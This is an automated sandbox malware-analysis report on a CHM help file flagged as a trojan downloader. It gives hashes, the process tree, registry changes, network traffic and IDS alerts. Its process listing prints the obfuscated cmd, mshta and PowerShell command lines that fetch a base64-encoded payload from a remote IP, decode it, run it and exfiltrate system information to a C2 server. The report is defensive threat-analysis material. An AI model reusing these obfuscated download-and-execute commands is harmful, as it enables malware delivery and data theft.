analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Dopolnenie_CBR.chm

Full analysis: https://app.any.run/tasks/4f0cdc4e-f9b4-4904-8b4f-8ee7e5cc7328
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Malware Trends Tracker     >>>
Analysis date: November 15, 2018, 13:51:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
opendir
Indicators:
MIME: application/octet-stream
File info: MS Windows HtmlHelp Data
MD5:

F7E6785E5F6BFEB8AB16A87968B9A172

SHA1:

20055FC3F1DB35B279F15D398914CABA11E5AD9D

SHA256:

77775F1DBFCEB1F1915D2DB067A0A8239DAB771D41084FC89E9478F3995F2498

SSDEEP:

96:tyjcFB7/c4FtSd28IihG3KjA0FQ/kdi0IAQgSctgFXXCRk2cBM:tyetSd2zihG3Kj5B2ciXCm

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • rherhef.com (PID: 3196)
      • cmd.exe (PID: 3336)
      • cmd.exe (PID: 4040)
      • rherheff.com (PID: 2640)
      • rherheff.com (PID: 2968)
      • rherhe.com (PID: 2652)
      • cmd.exe (PID: 2940)
      • cmd.exe (PID: 1076)
      • cmd.exe (PID: 1544)
      • cmd.exe (PID: 3116)

    • Changes the autorun value in the registry

      • rherhe.com (PID: 2652)

  • SUSPICIOUS

    • Reads internet explorer settings

      • hh.exe (PID: 2944)

    • Starts CMD.EXE for commands execution

      • hh.exe (PID: 2944)
      • mshta.exe (PID: 4008)
      • rherhe.com (PID: 2652)

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 3336)

    • Starts application with an unusual extension

      • rherheff.com (PID: 2968)
      • cmd.exe (PID: 4040)
      • rherhef.com (PID: 3196)

    • Executable content was dropped or overwritten

      • cmd.exe (PID: 4040)
      • rherhef.com (PID: 3196)
      • rherhe.com (PID: 2652)

    • Creates files in the user directory

      • rherhe.com (PID: 2652)

    • Uses SYSTEMINFO.EXE to read environment

      • cmd.exe (PID: 1076)

    • Creates files in the program directory

      • cmd.exe (PID: 1076)

    • Starts NET.EXE for network exploration

      • cmd.exe (PID: 2940)

    • Uses IPCONFIG.EXE to discover IP address

      • cmd.exe (PID: 1544)

    • Uses WHOAMI.EXE to obtaining logged on user information

      • cmd.exe (PID: 3116)

    • Connects to server without host name

      • rherhe.com (PID: 2652)

  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 4008)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.chi | Windows HELP Index (81)
.chm | Windows HELP File (18.9)

EXIF

EXE

LanguageCode: English (U.S.)
CHMVersion: 3
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
57
Monitored processes
16
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start hh.exe no specs cmd.exe no specs mshta.exe cmd.exe rherheff.com no specs rherheff.com no specs rherhef.com rherhe.com cmd.exe no specs systeminfo.exe no specs cmd.exe no specs net.exe no specs cmd.exe no specs ipconfig.exe no specs cmd.exe no specs whoami.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2944"C:\Windows\hh.exe" C:\Users\admin\AppData\Local\Temp\Dopolnenie_CBR.chmC:\Windows\hh.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® HTML Help Executable
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3336"C:\Windows\System32\cmd.exe" ,/b,^, ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,/C,, st%ALLUSERSPROFILE:~8,1%rt msht%ALLUSERSPROFILE:~8,1% H%ALLUSERSPROFILE:~12,1%%ALLUSERSPROFILE:~12,1%p://146.0.72.139/liC:\Windows\System32\cmd.exehh.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
4008mshta Http://146.0.72.139/liC:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
4040"C:\Windows\System32\cmd.exe" /c copy C:\\Windows\\System32\\cmd.exe C:\Users\admin\AppData\Local\Temp\\rherheff.com && C:\Users\admin\AppData\Local\Temp\\rherheff.com /c &Set skk= -Encoding&& Set ski= Byte && Set asidfjhfwssss=den -n%ALLUSERSPROFILE:~5,1%ninter&&Set asidfjhfwsss=-n%ALLUSERSPROFILE:~5,1%p -W hid&& Set asidfjhfwsssss=active -c (new-%ALLUSERSPROFILE:~5,1%bj&& Set asidfjhfwss=ect System.Net.WebClie&& Set par5=nt).D%ALLUSERSPROFILE:~5,1%wnl%ALLUSERSPROFILE:~5,1%&& Set asidfjhfwsssssssssssssss=adfile& copy C:\\Windows\\System32\\WiNDOWSPOWerShELl\\v1.0\\pOWErsheLl.ExE C:\Users\admin\AppData\Local\Temp\\rherhef.com& C:\Users\admin\AppData\Local\Temp\\rherheff.com /c C:\Users\admin\AppData\Local\Temp\\rherhef.com %asidfjhfwsss%%asidfjhfwssss%%asidfjhfwsssss%%asidfjhfwss%%par5%%asidfjhfwsssssssssssssss%('Ht^Tp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\rherhe.txt'); $sr=Get-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\rherhe.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\rherhe.com $sv; C:\Users\admin\AppData\Local\Temp\\rherhe.com;C:\Windows\System32\cmd.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2640C:\Users\admin\AppData\Local\Temp\\rherheff.com /c C:\Users\admin\AppData\Local\Temp\rherheff.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2968C:\Users\admin\AppData\Local\Temp\\rherheff.com /c C:\Users\admin\AppData\Local\Temp\\rherhef.com %asidfjhfwsss%%asidfjhfwssss%%asidfjhfwsssss%%asidfjhfwss%%par5%%asidfjhfwsssssssssssssss%('HtTp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\rherhe.txt'); $sr=Get-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\rherhe.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\rherhe.com $sv; C:\Users\admin\AppData\Local\Temp\\rherhe.com;C:\Users\admin\AppData\Local\Temp\rherheff.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3196C:\Users\admin\AppData\Local\Temp\\rherhef.com -nop -W hidden -noninteractive -c (new-object System.Net.WebClient).Downloadfile('HtTp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\rherhe.txt'); $sr=Get-Content -Encoding Byte C:\Users\admin\AppData\Local\Temp\\rherhe.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content -Encoding Byte C:\Users\admin\AppData\Local\Temp\\rherhe.com $sv; C:\Users\admin\AppData\Local\Temp\\rherhe.com;C:\Users\admin\AppData\Local\Temp\rherhef.com
rherheff.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2652"C:\Users\admin\AppData\Local\Temp\rherhe.com"C:\Users\admin\AppData\Local\Temp\rherhe.com
rherhef.com
User:
admin
Company:
MS DefenderApplication
Integrity Level:
MEDIUM
Description:
MS DefenderApplicationController
Version:
2.0.4.9
1076"C:\Windows\System32\cmd.exe" /C systeminfo >> C:\ProgramData\INFOCONTENT.TXTC:\Windows\System32\cmd.exerherhe.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2844systeminfo C:\Windows\system32\systeminfo.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Displays system information
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
613
Read events
508
Write events
105
Delete events
0

Modification events

(PID) Process:(2944) hh.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2944) hh.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(4008) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(4008) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(4008) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
(PID) Process:(4008) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:writeName:SavedLegacySettings
Value:
4600000069000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
(PID) Process:(3196) rherhef.comKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3196) rherhef.comKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\rherhef_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3196) rherhef.comKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\rherhef_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(3196) rherhef.comKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\rherhef_RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
Executable files
4
Suspicious files
2
Text files
6
Unknown types
4

Dropped files

PID
Process
Filename
Type
2944hh.exeC:\Users\admin\AppData\Local\Temp\isoE3C1.tmp
MD5:
SHA256:
2944hh.exeC:\Users\admin\AppData\Local\Temp\IMTE3C2.tmp
MD5:
SHA256:
2944hh.exeC:\Users\admin\AppData\Local\Temp\IMTE3D3.tmp
MD5:
SHA256:
2944hh.exeC:\Users\admin\AppData\Local\Temp\IMTE3D4.tmp
MD5:
SHA256:
2944hh.exeC:\Users\admin\AppData\Local\Temp\IMTE3D5.tmp
MD5:
SHA256:
2944hh.exeC:\Users\admin\AppData\Local\Temp\IMTE3E6.tmp
MD5:
SHA256:
2944hh.exeC:\Users\admin\AppData\Local\Temp\IMT623E.tmp
MD5:
SHA256:
2944hh.exeC:\Users\admin\AppData\Local\Temp\~DF2049CC4059556438.TMP
MD5:
SHA256:
2944hh.exeC:\Users\admin\AppData\Local\Temp\~DFA130B91F7730F3BE.TMP
MD5:
SHA256:
4008mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\li[1]html
MD5:D0FA1AB050BEDE3522650FAA54BBAB2D
SHA256:9D10F123C6252C7DB2BE34176B5D76101286DBABC976AD9E0A2493D5D7559295
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
3
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4008
mshta.exe
GET
200
146.0.72.139:80
http://146.0.72.139/li
NL
html
2.93 Kb
suspicious
3196
rherhef.com
GET
200
146.0.72.139:80
http://146.0.72.139/flk
NL
text
136 Kb
suspicious
2652
rherhe.com
POST
200
146.0.72.188:80
http://146.0.72.188/ipv6/mod/checker_info.php
NL
text
65 b
malicious
2652
rherhe.com
GET
200
146.0.72.188:80
http://146.0.72.188/ipv6/ipvcheck.php?dns=c4ba3647
NL
text
5 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3196
rherhef.com
146.0.72.139:80
Hostkey B.v.
NL
suspicious
2652
rherhe.com
146.0.72.188:80
Hostkey B.v.
NL
malicious
4008
mshta.exe
146.0.72.139:80
Hostkey B.v.
NL
suspicious

DNS requests

Domain
IP
Reputation
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
3196
rherhef.com
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
3196
rherhef.com
A Network Trojan was detected
ET TROJAN Windows executable base64 encoded
3196
rherhef.com
Misc activity
POLICY [PTsecurity] Executable base64 Payload
2652
rherhe.com
A Network Trojan was detected
MALWARE [PTsecurity] SystemInfo Exfiltration
2652
rherhe.com
A Network Trojan was detected
MALWARE [PTsecurity] SystemInfo Exfiltration
2652
rherhe.com
Potentially Bad Traffic
GPL ATTACK_RESPONSE command completed
2652
rherhe.com
A Network Trojan was detected
ET TROJAN TrueBot/Silence.Downloader Keep-Alive
2652
rherhe.com
Misc activity
SUSPICIOUS [PTsecurity] Possible TrojanDownloader
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Dopolnenie_CBR.chm